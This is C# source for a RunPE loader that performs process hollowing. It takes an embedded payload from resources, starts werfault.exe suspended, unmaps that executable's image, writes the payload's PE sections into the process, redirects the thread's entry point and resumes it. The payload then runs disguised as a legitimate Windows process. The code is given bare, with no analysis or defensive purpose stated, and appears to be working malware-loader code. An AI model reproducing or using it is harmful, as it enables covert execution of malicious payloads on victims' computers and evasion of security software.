public static void method1()
{
byte[] Payload = ResourceGetter.GetPayload();
string frameworkPath = RuntimeEnvironment.GetRuntimeDirectory();
string cscPath = Path.Combine(frameworkPath, "csc.exe");
string sysPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
string winLogonPath = Path.Combine(sysPath, "werfault.exe");
RunPE.Run(winLogonPath, string.Empty, Payload, true);
}
private static bool HandleRun(string path, string cmd, byte[] data, bool compatible)
{
int num = 0;
string text = string.Format("\"{0}\"", path);
STARTUP_INFORMATION sTARTUP_INFORMATION = default(RunPE.STARTUP_INFORMATION);
PROCESS_INFORMATION pROCESS_INFORMATION = default(RunPE.PROCESS_INFORMATION);
sTARTUP_INFORMATION.Size = Convert.ToUInt32(Marshal.SizeOf(typeof(RunPE.STARTUP_INFORMATION)));
bool result;
try
{
if (!string.IsNullOrEmpty(cmd))
{
text = text + " " + cmd;
}
if (!RunPE.CreateProcess(path, text, IntPtr.Zero, IntPtr.Zero, false, 4u, IntPtr.Zero, null, ref sTARTUP_INFORMATION, ref pROCESS_INFORMATION))
{
throw new Exception();
}
int num2 = BitConverter.ToInt32(data, 60);
int num3 = BitConverter.ToInt32(data, num2 + 52);
int[] array = new int[179];
array[0] = 65538;
if (IntPtr.Size == 4)
{
if (!GetThreadContext(pROCESS_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
}
else
{
if (!Wow64GetThreadContext(pROCESS_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
}
int num4 = array[41];
int num5 = 0;
if (!ReadProcessMemory(pROCESS_INFORMATION.ProcessHandle, num4 + 8, ref num5, 4, ref num))
{
throw new Exception();
}
if (num3 == num5)
{
if (NtUnmapViewOfSection(pROCESS_INFORMATION.ProcessHandle, num5) != 0)
{
throw new Exception();
}
}
int length = BitConverter.ToInt32(data, num2 + 80);
int bufferSize = BitConverter.ToInt32(data, num2 + 84);
bool flag = false;
int num6 = VirtualAllocEx(pROCESS_INFORMATION.ProcessHandle, num3, length, 12288, 64);
if (!compatible && num6 == 0)
{
flag = true;
num6 = VirtualAllocEx(pROCESS_INFORMATION.ProcessHandle, 0, length, 12288, 64);
}
if (num6 == 0)
{
throw new Exception();
}
if (!WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle, num6, data, bufferSize, ref num))
{
throw new Exception();
}
int num7 = num2 + 248;
short num8 = BitConverter.ToInt16(data, num2 + 6);
for (int i = 0; i <= (int)(num8 - 1); i++)
{
int num9 = BitConverter.ToInt32(data, num7 + 12);
int num10 = BitConverter.ToInt32(data, num7 + 16);
int srcOffset = BitConverter.ToInt32(data, num7 + 20);
if (num10 != 0)
{
byte[] array2 = new byte[num10];
Buffer.BlockCopy(data, srcOffset, array2, 0, array2.Length);
if (!WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle, num6 + num9, array2, array2.Length, ref num))
{
throw new Exception();
}
}
num7 += 40;
}
byte[] bytes = BitConverter.GetBytes(num6);
if (!WriteProcessMemory(pROCESS_INFORMATION.ProcessHandle, num4 + 8, bytes, 4, ref num))
{
throw new Exception();
}
int num11 = BitConverter.ToInt32(data, num2 + 40);
if (flag)
{
num6 = num3;
}
array[44] = num6 + num11;
if (IntPtr.Size == 4)
{
if (!SetThreadContext(pROCESS_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
}
else
{
if (!Wow64SetThreadContext(pROCESS_INFORMATION.ThreadHandle, array))
{
throw new Exception();
}
}
if (ResumeThread(pROCESS_INFORMATION.ThreadHandle) == -1)
{
throw new Exception();
}
}
catch (Exception)
{
Process processById = Process.GetProcessById(Convert.ToInt32(pROCESS_INFORMATION.ProcessId));
if (processById != null)
{
processById.Kill();
}
result = false;
return(result);
}
result = true;
return(result);
}
